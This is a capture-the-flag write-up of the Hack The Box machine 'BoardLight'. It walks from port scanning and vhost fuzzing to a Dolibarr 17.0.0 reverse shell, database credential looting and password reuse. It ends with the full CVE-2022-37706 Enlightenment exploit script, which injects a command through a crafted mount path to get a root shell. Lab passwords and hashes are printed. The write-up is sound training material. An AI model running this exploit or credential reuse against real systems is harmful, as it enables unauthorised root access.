BoardLight - wook413

#hackthebox #linux #easy ![[Pasted image 20250815224400.png]] # Information Gathering - Nmap I started off with scanning all TCP ports. ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ nmap $IP -Pn -n --open --min-rate 3000 -p- Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-16 01:11 UTC Nmap scan report for 10.10.11.11 Host is up (0.054s latency). Not shown: 64993 closed tcp ports (reset), 540 filtered tcp ports (no-response) Some closed ports may be reported as filtered due to --defeat-rst-ratelimit PORT STATE SERVICE 22/tcp open ssh 80/tcp open http Nmap done: 1 IP address (1 host up) scanned in 18.30 seconds ``` Then I scanned ports 22 and 80 again to gather more information. ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ nmap $IP -sCV -p 22,80 Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-16 01:12 UTC Nmap scan report for 10.10.11.11 Host is up (0.050s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 06:2d:3b:85:10:59:ff:73:66:27:7f:0e:ae:03:ea:f4 (RSA) | 256 59:03:dc:52:87:3a:35:99:34:44:74:33:78:31:35:fb (ECDSA) |_ 256 ab:13:38:e4:3e:e0:24:b4:69:38:a9:63:82:38:dd:f4 (ED25519) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-title: Site doesn't have a title (text/html; charset=UTF-8). |_http-server-header: Apache/2.4.41 (Ubuntu) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 8.74 seconds ``` I scanned top 10 UDP ports. ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ nmap $IP -sU --top-ports 10 Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-16 01:34 UTC Nmap scan report for board.htb (10.10.11.11) Host is up (0.047s latency). PORT STATE SERVICE 53/udp closed domain 67/udp closed dhcps 123/udp closed ntp 135/udp closed msrpc 137/udp open|filtered netbios-ns 138/udp open|filtered netbios-dgm 161/udp closed snmp 445/udp closed microsoft-ds 631/udp closed ipp 1434/udp closed ms-sql-m Nmap done: 1 IP address (1 host up) scanned in 6.36 seconds ``` --- # Enumeration ##### HTTP - TCP 80 Navigating to the IP address on browser reveals a website. The page introduces `Boardlight`, a cybersecurity consulting firm. ![[Pasted image 20250815201636.png]] I looked everywhere on the page but couldn't find anything useful that can lead me to the next steps. I ran `gobuster` but it didn't reveal much either. Then I looked for `vhosts` and I found a vhost named `crm`. ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ ffuf -u http://$IP -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H "Host: FUZZ.board.htb" -fw 6243 /'___\ /'___\ /'___\ /\ \__/ /\ \__/ __ __ /\ \__/ \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\ \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/ \ \_\ \ \_\ \ \____/ \ \_\ \/_/ \/_/ \/___/ \/_/ v2.1.0-dev ________________________________________________ :: Method : GET :: URL : http://10.10.11.11 :: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt :: Header : Host: FUZZ.board.htb :: Follow redirects : false :: Calibration : false :: Timeout : 10 :: Threads : 40 :: Matcher : Response status: 200-299,301,302,307,401,403,405,500 :: Filter : Response words: 6243 ________________________________________________ crm [Status: 200, Size: 6360, Words: 397, Lines: 150, Duration: 63ms] :: Progress: [4989/4989] :: Job [1/1] :: 122 req/sec :: Duration: [0:00:12] :: Errors: 0 :: ``` I mapped `crm.board.htb` to the target IP address in `/etc/hosts` file. `crm.board.htb` page has a login form in the middle and it's hosting a service named `Dolibarr v17.0.0`. `Dolibarr` is an Open Source CRM solution. ![[Pasted image 20250815204813.png]] ![[Pasted image 20250815205057.png]] # Initial Access - shell as `www-data` I looked up `dolibarr 17.0.0 exploit` and I got some hits. Apparently, there's a known vulnerability to this version of the software. ![[Pasted image 20250815205734.png]] Got a reverse shell as `www-data` using the exploit! ![[Pasted image 20250815210234.png]] `dolibarrowner:serverfun2$2023!!` ![[Pasted image 20250815210935.png]] ```bash www-data@boardlight:~/html/crm.board.htb/htdocs/conf$ ss -tulnp Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port Process udp UNCONN 0 0 0.0.0.0:5353 0.0.0.0:* udp UNCONN 0 0 0.0.0.0:54618 0.0.0.0:* udp UNCONN 0 0 127.0.0.53%lo:53 0.0.0.0:* udp UNCONN 0 0 0.0.0.0:68 0.0.0.0:* udp UNCONN 0 0 [::]:53925 [::]:* udp UNCONN 0 0 [::]:5353 [::]:* tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:* tcp LISTEN 0 70 127.0.0.1:33060 0.0.0.0:* tcp LISTEN 0 4096 127.0.0.53%lo:53 0.0.0.0:* tcp LISTEN 0 151 127.0.0.1:3306 0.0.0.0:* tcp LISTEN 0 511 *:80 *:* ``` `/etc/passwd` ```bash sssd:x:126:131:SSSD system user,,,:/var/lib/sss:/usr/sbin/nologin larissa:x:1000:1000:larissa,,,:/home/larissa:/bin/bash systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin mysql:x:127:134:MySQL Server,,,:/nonexistent:/bin/false fwupd-refresh:x:128:135:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin sshd:x:129:65534::/run/sshd:/usr/sbin/nologin _laurel:x:998:998::/var/log/laurel:/bin/false ``` I was able to login to `mysql` client with the credentials I discovered earlier in the config file. ```bash www-data@boardlight:~/html/crm.board.htb/htdocs/conf$ mysql -h localhost -u dolibarrowner -p Enter password: Welcome to the MySQL monitor. Commands end with ; or \g. Your MySQL connection id is 940 Server version: 8.0.36-0ubuntu0.20.04.1 (Ubuntu) Copyright (c) 2000, 2024, Oracle and/or its affiliates. Oracle is a registered trademark of Oracle Corporation and/or its affiliates. Other names may be trademarks of their respective owners. Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. mysql> ``` `show databases` revealed 3 databases. I selected `dolibarr` db. ```sql mysql> show databases; +--------------------+ | Database | +--------------------+ | dolibarr | | information_schema | | performance_schema | +--------------------+ 3 rows in set (0.00 sec) ``` There are too many tables under `dolibarr` db. There is a column that I'm interested in: `llx_user`. ```bash mysql> show tables; +-------------------------------------------------------------+ | Tables_in_dolibarr | +-------------------------------------------------------------+ | llx_accounting_account | | llx_accounting_bookkeeping | | llx_accounting_bookkeeping_tmp | | llx_accounting_fiscalyear | | llx_accounting_groups_account | ... <SNIP> ``` `select * from llx_user` returned the following: ```bash mysql> select * from llx_user; | rowid | entity | ref_employee | ref_ext | admin | employee | fk_establishment | datec | tms | fk_user_crea t | fk_user_modif | login | pass_encoding | pass | pass_crypted | pass_temp | api_key | gender | civility | lastname | firstname | address | zip | town | fk_state | fk_country | birth | birth_place | job | office_pho ne | office_fax | user_mobile | personal_mobile | email | personal_email | signature | socialnetworks | fk_soc | fk_socpeople | fk_member | fk_user | fk_user_expense_validator | fk_user_holiday_validator | idpers1 | idpers2 | idpers3 | note_public | note_private | model_pdf | datelastlogin | datepreviouslogin | datelastpassvalidation | datestartvalidity | dateendvalidity | iplastlogin | ippreviouslogin | egroupware_id | ldap_sid | openid | statut | photo | lang | color | barcode | fk_barcode_type | accountancy_code | nb_holiday | thm | t jm | salary | salaryextra | dateemployment | dateemploymentend | weeklyhours | import_key | default_range | default_c_exp_tax_cat | natio nal_registration_number | fk_warehouse | | 1 | 0 | | NULL | 1 | 1 | 0 | 2024-05-13 13:21:56 | 2024-05-13 13:21:56 | NUL L | NULL | dolibarr | NULL | NULL | $2y$10$VevoimSke5Cd1/nX1Ql9Su6RstkTRe7UX1Or.cm8bZo56NjCMJzCm | NULL | NULL | | | SuperAdmin | | | | | NULL | NULL | NULL | NULL | | | | | | | | | null | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | | | NULL | 2024-05-15 09:57:04 | 2024-05-13 23:23:59 | NULL | NULL | NULL | 10.10.14.31 | 10.10.14.41 | NULL | | NULL | 1 | NULL | NULL | | NULL | 0 | | 0 | NULL | N ULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | | NULL | | 2 | 1 | | NULL | 0 | 1 | 0 | 2024-05-13 13:24:01 | 2024-05-15 09:58:40 | NUL L | NULL | admin | NULL | NULL | $2y$10$gIEKOl7VZnr5KLbBDzGbL.YuJxwz5Sdl5ji3SEuiUSlULgAhhjH96 | NULL | yr6V3pXd9 QEI | NULL | | admin | | | | | NULL | NULL | NULL | NULL | | | | | | | | | [] | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | | | NULL | 2025-08-15 18:59:59 | 2025-08-15 18:56:04 | NULL | NULL | NULL | 10.10.14.10 | 10.10.14.10 | NULL | | NULL | 1 | NULL | NULL | | NULL | 0 | | 0 | NULL | N ULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | | NULL | +-------+--------+--------------+---------+-------+----------+------------------+---------------------+---------------------+------------- --+---------------+----------+---------------+------+--------------------------------------------------------------+-----------+---------- ----+--------+----------+------------+-----------+---------+------+------+----------+------------+-------+-------------+------+----------- ---+------------+-------------+-----------------+-------+----------------+-----------+----------------+--------+--------------+----------- +---------+---------------------------+---------------------------+---------+---------+---------+-------------+--------------+-----------+ ---------------------+---------------------+------------------------+-------------------+-----------------+-------------+----------------- +---------------+----------+--------+--------+-------+------+-------+---------+-----------------+------------------+------------+------+-- ----+--------+-------------+----------------+-------------------+-------------+------------+---------------+-----------------------+------ ------------------------+--------------+ ``` Because there are too many columns in the table, it looks messy. However, we discovered 2 users and their hashes and 1 api key. ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ cat hashes.txt $2y$10$VevoimSke5Cd1/nX1Ql9Su6RstkTRe7UX1Or.cm8bZo56NjCMJzCm $2y$10$gIEKOl7VZnr5KLbBDzGbL.YuJxwz5Sdl5ji3SEuiUSlULgAhhjH96 ``` I was not able to crack those passwords. Maybe I could but it took too much time which usually indicates that this is not the intended way of solving the box. I didn't think to use the password I found earlier against `larissa`. I tried the password and it let me in hahaha. ```bash www-data@boardlight:~/html/crm.board.htb/scripts/user$ su larissa Password: larissa@boardlight:/var/www/html/crm.board.htb/scripts/user$ whoami larissa ``` Found `user.txt` in `/home/larissa` ```bash larissa@boardlight:~$ cat user.txt 2a9... ``` # Privilege Escalation - shell as `root` I looked around the target machine and inside `/home/larissa`, there were too many folders and I felt like looking through them would lead me down rabbit holes so I decided to run `linPEAS` instead. So I navigated to `/dev/shm` to transfer `linPEAS` from my kali to the target machine. Funny enough, there were already `linpeas.sh` binary and `lin.txt` which appeared to be the output of `linPEAS` ```bash larissa@boardlight:/dev/shm$ ls linpeas.sh lin.txt ``` ![[Pasted image 20250815221133.png]] ```bash larissa@boardlight:/dev/shm$ id uid=1000(larissa) gid=1000(larissa) groups=1000(larissa),4(adm) ``` I looked up files that have SUID bit set. I noticed there are 4 binaries that have SUID bit set and also belong to same `/enlightenment` directory ```bash larissa@boardlight:~/Downloads/esigned/esigned-html$ find / -type f -perm -4000 2>/dev/null /usr/lib/eject/dmcrypt-get-device /usr/lib/xorg/Xorg.wrap /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_ckpasswd /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_backlight /usr/lib/x86_64-linux-gnu/enlightenment/modules/cpufreq/linux-gnu-x86_64-0.23.1/freqset /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/openssh/ssh-keysign /usr/sbin/pppd /usr/bin/newgrp /usr/bin/mount /usr/bin/sudo /usr/bin/su /usr/bin/chfn /usr/bin/umount /usr/bin/gpasswd /usr/bin/passwd /usr/bin/fusermount /usr/bin/chsh /usr/bin/vmware-user-suid-wrapper ``` I was able to find the version of `Enlightenment` with `--version` option. ```bash larissa@boardlight:/usr/lib/x86_64-linux-gnu$ enlightenment --version ESTART: 0.00001 [0.00001] - Begin Startup ESTART: 0.00130 [0.00129] - Signal Trap ESTART: 0.00132 [0.00003] - Signal Trap Done ESTART: 0.00327 [0.00194] - Eina Init ESTART: 0.00684 [0.00358] - Eina Init Done ESTART: 0.00689 [0.00004] - Determine Prefix ESTART: 0.00812 [0.00124] - Determine Prefix Done ESTART: 0.00816 [0.00004] - Environment Variables ESTART: 0.00819 [0.00003] - Environment Variables Done ESTART: 0.00822 [0.00002] - Parse Arguments Version: 0.23.1 E: Begin Shutdown Procedure! ``` I searched for `enlightenment 0.23.1 exploit` and came across [this Github repo](https://github.com/MaherAzzouzi/CVE-2022-37706-LPE-exploit). The author is the one who discovered `CVE-2022-37706` and provides a step-by-step explanation of the vulnerability and exploit with clear, easy-to-follow instructions. So I downloaded the exploit in my kali and copied it to the target machine. ![[Pasted image 20250815224118.png]] This is what's inside the payload. I'll briefly explain how this payload works. *The Problem* : `Enlightment` includes a helper program called `enlightenment_sys` and it's installed with the `SUID bit` also it doesn't properly handle certain file paths. If you give it a path starting with `/dev/..` and containing special character (like `;`), it doesn't sanitize the input. *The exploit*: Because of that, you can inject commands into the way it calls other system utilities. You can trick `enlightenment_sys` into executing your own program/script as `root`. *Step-By-Step* 1. Look for `enlightenment_sys` with the SUID bit set. 2. Prepare a malicious file (e.g., `/tmp/exploit` that just runs `/bin/bash`) 3. Abuse the path handling: Run `enlightenment_sys` with a path like `/dev/../tmp/;/tmp/exploit`. The `;` semicolon makes the system run `/tmp/exploit` as root. 4. Since `/tmp/exploit` just launches a shell, you end up with a root shell. ```bash larissa@boardlight:/dev/shm$ cat exploit.sh #!/bin/bash echo "CVE-2022-37706" echo "[*] Trying to find the vulnerable SUID file..." echo "[*] This may take few seconds..." file=$(find / -name enlightenment_sys -perm -4000 2>/dev/null | head -1) if [[ -z ${file} ]] then echo "[-] Couldn't find the vulnerable SUID file..." echo "[*] Enlightenment should be installed on your system." exit 1 fi echo "[+] Vulnerable SUID binary found!" echo "[+] Trying to pop a root shell!" mkdir -p /tmp/net mkdir -p "/dev/../tmp/;/tmp/exploit" echo "/bin/sh" > /tmp/exploit chmod a+x /tmp/exploit echo "[+] Enjoy the root shell :)" ${file} /bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), "/dev/../tmp/;/tmp/exploit" /tmp///net ``` A moment after I ran `exploit.sh`, I obtained a shell as `root` ```bash larissa@boardlight:/dev/shm$ ./exploit.sh CVE-2022-37706 [*] Trying to find the vulnerable SUID file... [*] This may take few seconds... [+] Vulnerable SUID binary found! [+] Trying to pop a root shell! [+] Enjoy the root shell :) mount: /dev/../tmp/: can't find in /etc/fstab. # whoami root ``` Found `root.txt` ```bash # cat root.txt 2b4... ```